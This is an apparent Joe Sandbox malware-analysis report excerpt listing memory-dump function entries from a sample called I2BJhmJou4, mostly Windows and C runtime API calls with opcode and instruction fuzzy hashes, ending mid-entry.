                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1518329722-0
                                                          • Opcode ID: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
                                                          • Instruction ID: 61ae58f5a109cdc23c8a561ccb435e29d9a033fb164f50c0495edfbe46b21ef4
                                                          • Opcode Fuzzy Hash: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
                                                          • Instruction Fuzzy Hash: 00F0F4B1B001147B6B24DF2D880489FBEE9EAC6364726825BE809D3345E574DD05C295
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0045D0B5,?,?,00000008,?,?,0045CC90,00000000), ref: 0045D387
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                          • Instruction ID: 2e63c45fd147d1bc419a1cf421641fdd954adc511095b72776a1a782a704c190
                                                          • Opcode Fuzzy Hash: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                          • Instruction Fuzzy Hash: EBB15E31A10605CFD724CF28C486B657BA0FF45366F258699EC99CF3A2C339E986CB45
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02F2D31C,?,?,00000008,?,?,02F2CEF7,00000000), ref: 02F2D5EE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                          • Instruction ID: f8949d5b20b1b398bfd6b6ea1841418aa684b7fbbd9418f4c01da594bcac43eb
                                                          • Opcode Fuzzy Hash: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                          • Instruction Fuzzy Hash: 13B14D32610618CFD719CF28C48AB657BA0FF463A8F258658E9D9CF2A1C335E995CF40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: y_B>
                                                          • API String ID: 0-1404922283
                                                          • Opcode ID: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                          • Instruction ID: 4c2ea87e6ed6cce11d3262b2c37c8ab9346d24596443f962e79d9f7238e8cba2
                                                          • Opcode Fuzzy Hash: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                          • Instruction Fuzzy Hash: E11241B170D361CBDB249F18E49153EBAE4AB94310FA54A5FE0C9CB364D678D8C19B0B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: a
                                                          • API String ID: 0-3904355907
                                                          • Opcode ID: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction ID: 318bea0468e25d50bc193c40de4e6b6217f0263c2ba9fd996b50af1c70fb3ca8
                                                          • Opcode Fuzzy Hash: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction Fuzzy Hash: AE121370608740DFD724CF19C980BABBBE2FBC8304F54892EE58987350D779E9858B96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: a
                                                          • API String ID: 0-3904355907
                                                          • Opcode ID: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction ID: c5e8372de7d898db48012febf39b65a3599245ca56fa3b88f4c7493a07949394
                                                          • Opcode Fuzzy Hash: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction Fuzzy Hash: 211224706487419FDB24CF19C884B6BBBE2BF88308F84992DF59A87250D775E948CF52
                                                          APIs
                                                            • Part of subcall function 00450330: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371
                                                          • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452057
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004520D2
                                                          • FindClose.KERNEL32(00000000), ref: 004520F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$AllocateCloseFirstHeapNext
                                                          • String ID:
                                                          • API String ID: 2963102669-0
                                                          • Opcode ID: 32231ab2968142434609d1874502abdd1f938d36c1a7161d4ca85e8f4d9ecd2a
                                                          • Instruction ID: f7a7cccc38e2a98a3a0fd08442e24a40366e03b93faff9898a26c82b853a1aca
                                                          • Opcode Fuzzy Hash: 32231ab2968142434609d1874502abdd1f938d36c1a7161d4ca85e8f4d9ecd2a
                                                          • Instruction Fuzzy Hash: 59413A726002096FDB14AF69DC85EBFB36AEF81319F14416BFD0597282EB789D08C658
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0043D0CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID:
                                                          • API String ID: 2325560087-0
                                                          • Opcode ID: 791a5783c13089c55432eecac0b459280e2b3968fd8be309c5ac16e94238550e
                                                          • Instruction ID: 4f8493139679013ee20e08bfcd7abab68794bcc2040eb7ee6f469f72a5842b4a
                                                          • Opcode Fuzzy Hash: 791a5783c13089c55432eecac0b459280e2b3968fd8be309c5ac16e94238550e
                                                          • Instruction Fuzzy Hash: E55106B1E002058FEB14CF55E8857ABBBF5FB48310F24947AD415EB354E3B8A980CB99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: a
                                                          • API String ID: 0-3904355907
                                                          • Opcode ID: 74cedb3eb2f680694ce7935cfb3b67ee33ab9ad9c5e3efc4d66dd220d35ca717
                                                          • Instruction ID: 722ab9fffa63a2ef7d1a063d6d10cc189525accf299069018822edd1fef34131
                                                          • Opcode Fuzzy Hash: 74cedb3eb2f680694ce7935cfb3b67ee33ab9ad9c5e3efc4d66dd220d35ca717
                                                          • Instruction Fuzzy Hash: 74E125702083419FD724CF19C584BABB7E1BFC8354F05892EF59987250E778E989CB9A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
                                                          • Instruction ID: 6805fc177e5a21a8fc89f3ef778ad857fbed6e7e0560c1e63e2cf7952b3af78f
                                                          • Opcode Fuzzy Hash: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
                                                          • Instruction Fuzzy Hash: 85C1DC74A0060A8FCF24CF68C5907AFB7B2AF06388F94461DD78E9B791D731A846CB51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: VUUU
                                                          • API String ID: 0-2040033107
                                                          • Opcode ID: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
                                                          • Instruction ID: 8f7341bf09dd7d88668ef3d11c74458aa2ddba69b727948ac3827fc30a91a2a0
                                                          • Opcode Fuzzy Hash: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
                                                          • Instruction Fuzzy Hash: 29C1A7756183019BDB1C8A19C59153EBBE5AB85314F24C93FE15ADB3F4E23CD8419B0B
                                                          APIs
                                                          • VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryVirtual
                                                          • String ID:
                                                          • API String ID: 1804819252-0
                                                          • Opcode ID: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                          • Instruction ID: bb654dc0c729bd842e55c2d84f7a994ffa3bbf5d7aaa00ddc59bb9740fabb160
                                                          • Opcode Fuzzy Hash: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                          • Instruction Fuzzy Hash: C21182731102214BC720DF48CDC0AA773AAFB89718766026AD9445B711D17AECC7C7E4
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DestroyHeap
                                                          • String ID:
                                                          • API String ID: 2435110975-0
                                                          • Opcode ID: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                          • Instruction ID: 327f04a744b5650a880c0d17b4fb38287b6591765f983e0adcdd5822482b62ae
                                                          • Opcode Fuzzy Hash: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                          • Instruction Fuzzy Hash: D1119EB1900B848FD321CF69D845B9AFBF4FB49710F04C62AE8A897740D3786809CFA1
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0003CFB3,0043C903), ref: 0043CE8E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
                                                          • Instruction ID: 47f33e16290772828d48e2fc5bbc638760d2d50ec684603df376a2e6b4d14c41
                                                          • Opcode Fuzzy Hash: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
                                                          • Instruction Fuzzy Hash:
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: U
                                                          • API String ID: 0-3372436214
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                          • Instruction ID: 775a38982ecc14386774c10a2ff7988f4febef0241ab9f2fac4c7ed0a075f983
                                                          • Opcode Fuzzy Hash: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                          • Instruction Fuzzy Hash: 5F21AF71A002268FCB24CF58C890B6BB7B1FF86708F69865DC8066B342D775EC42CB95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                          • Instruction ID: 5cf5f964e5d4fdf4ab25e9de6bfd162346dccf7c83c49c61d1a40ba7c9897cbe
                                                          • Opcode Fuzzy Hash: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                          • Instruction Fuzzy Hash: 36118A77A1827107D711CE759CE021AF7629BC622270F4376D981AB352C170EC5892D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                          • Instruction ID: 5e6f75d6069618f27f4e8ece13d34dcb27fa1cb4973037488a19f9399b438bca
                                                          • Opcode Fuzzy Hash: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                          • Instruction Fuzzy Hash: 04E01A75A116849FD7018F25E994B007BA1E704B10F458066F800D7A79F3B86C80CF8E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                          • Instruction ID: 78adb8d2ee4c973c8605762d631ca60d62160a1591ddb5a7f66d0a391d21d68e
                                                          • Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                          • Instruction Fuzzy Hash: 4DC08C34400E808ACE39892082703B433A5A3817C6FC806CCCA0B8BA45C71E98C2EF00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                          • Instruction ID: 2572daf3ac28ea9ece149f63ca22f641f49709f61c5ee85f622209572a58cfb2
                                                          • Opcode Fuzzy Hash: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                          • Instruction Fuzzy Hash: 33D08C31365650AFCB41DB48DD42F00B3E0EB48B32F258282B830AB2F2C724FE41CA05
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                          • Instruction ID: c0944383d73aac26117361346b053748916b56d97ab65fadc12e4df891c8d7e9
                                                          • Opcode Fuzzy Hash: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                          • Instruction Fuzzy Hash: 7AB00279661540CFCA55CF08C198E00F3F4FB48760B068491EC05CB722C234ED41CA10
                                                          APIs
                                                          • type_info::operator==.LIBVCRUNTIME ref: 00459ABE
                                                          • CatchIt.LIBVCRUNTIME ref: 00459C1D
                                                          • _UnwindNestedFrames.LIBCMT ref: 00459D1E
                                                          • CallUnexpected.LIBVCRUNTIME ref: 00459D39
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                          • String ID: csm$csm$csm$x@F
                                                          • API String ID: 2332921423-3829711656
                                                          • Opcode ID: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                          • Instruction ID: 2a8b5e3cbe88d0ad45d83a49b6c8541956edddbcc5d33c7cd0fd48112d7d16c1
                                                          • Opcode Fuzzy Hash: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                          • Instruction Fuzzy Hash: F9B16771800249EBCF19DFA5C8819AEB7B5FF04316F18415AEC116B213D338EE59CBA9
                                                          APIs
                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0045C0FF), ref: 0045C7AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DecodePointer
                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                          • API String ID: 3527080286-3064271455
                                                          • Opcode ID: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
                                                          • Instruction ID: 82d02ba150d8eb4d5d6beeccfbe315dd90ac4e528bf330bfbd80dbdd17a07d9b
                                                          • Opcode Fuzzy Hash: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
                                                          • Instruction Fuzzy Hash: 585170B0900B0ADFCF149F69D8C81AEBBB0FB45316F14414BD881A6256DB788959CF5E
                                                          APIs
                                                            • Part of subcall function 00454B19: CreateFileW.KERNEL32(00000000,00000000,?,00454716,?,?,00000000,?,00454716,00000000,0000000C), ref: 00454B36
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,755AF770), ref: 00454781
                                                          • __dosmaperr.LIBCMT ref: 00454788
                                                          • GetFileType.KERNEL32(00000000), ref: 00454794
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,755AF770), ref: 0045479E
                                                          • __dosmaperr.LIBCMT ref: 004547A7
                                                          • CloseHandle.KERNEL32(00000000), ref: 004547C7
                                                          • CloseHandle.KERNEL32(00455523), ref: 00454914
                                                          • GetLastError.KERNEL32 ref: 00454946
                                                          • __dosmaperr.LIBCMT ref: 0045494D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID:
                                                          • API String ID: 4237864984-0
                                                          • Opcode ID: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
                                                          • Instruction ID: 038922a14cfed84d654bc7e4756cd55dec8d6f56b9250bad4a8b086e30f44e5e
                                                          • Opcode Fuzzy Hash: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
                                                          • Instruction Fuzzy Hash: C4A13731A041449FCF189F68DC91BAE3BA0EB87329F14015EFC019F392DB78885AC75A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: %1.17g$[,]{: }$false$null$true
                                                          • API String ID: 4218353326-762322047
                                                          • Opcode ID: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
                                                          • Instruction ID: 8a31c525fd10ccff58647d80abb421e7a2f49e00f52c285c36168c55111fec75
                                                          • Opcode Fuzzy Hash: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
                                                          • Instruction Fuzzy Hash: E8B1E4F27043015BC701A9298C5062BA6DA9FD1318F19493FEF59E33C2FA7EDD16425A
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 0043D7A7
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0043D7AF
                                                          • _ValidateLocalCookies.LIBCMT ref: 0043D838
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0043D863
                                                          • _ValidateLocalCookies.LIBCMT ref: 0043D8B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
                                                          • Instruction ID: f027fe2574540ca3b1f88e77f7abec4aa80c90a537e94c27518ff210aad43bfc
                                                          • Opcode Fuzzy Hash: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
                                                          • Instruction Fuzzy Hash: 0041EA34D012089BCF14EF69D881A9F7BB5FF48318F14816BE8249B352D739EA15CB95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
                                                          • Instruction ID: 20f6fc253ed9e18728f1e3e0f73237be974277a9ced04a575444c598e2f27323
                                                          • Opcode Fuzzy Hash: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
                                                          • Instruction Fuzzy Hash: 05B1F574A04285AFDB15CF99C980BBE7BB1BF86305F14415BE80067393C7B89D4ACB69
                                                          APIs
                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
                                                          • __FindPESection.LIBCMT ref: 0044C6D1
                                                          • VirtualQuery.KERNEL32(83000000,381389CC,0000001C,381389CC,?,?,?), ref: 0044C7B6
                                                          • __FindPESection.LIBCMT ref: 0044C7F3
                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0044C813
                                                          • __FindPESection.LIBCMT ref: 0044C82D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
                                                          • String ID:
                                                          • API String ID: 2529200597-0
                                                          • Opcode ID: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
                                                          • Instruction ID: e40285013e32dfb27aa5986082f3d9acaacd06ee7156ac865e10eba53592a1aa
                                                          • Opcode Fuzzy Hash: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
                                                          • Instruction Fuzzy Hash: 71A1F375E022159BEB50CFA9D9C07BEB3A4EB49314F19412AD855E3361E739DC028FA8
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00432EBD
                                                            • Part of subcall function 00430E6C: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                            • Part of subcall function 00432718: CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateCompatibleCreateHeapInfoParametersSystem
                                                          • String ID: Ku^%$Ku^%
                                                          • API String ID: 392924372-1067927601
                                                          • Opcode ID: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
                                                          • Instruction ID: 62ef33d165420df4abe6194fc317c011647a9d43179361cb113ffb45af4e0bee
                                                          • Opcode Fuzzy Hash: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
                                                          • Instruction Fuzzy Hash: 4AE12B71E006158BDF289E598D8657FB7B0AB0C314F24292BE511FA390D7BC9A418B8B
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0044C1F9,0043D4A6,0043CFF7), ref: 0044C210
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0044C21E
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0044C237
                                                          • SetLastError.KERNEL32(00000000,0044C1F9,0043D4A6,0043CFF7), ref: 0044C289
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
                                                          • Instruction ID: c0e2f545b2bb83990020f58b3cafac4cb819fbf5ee5e5dfe57bf4abdb9a8f05a
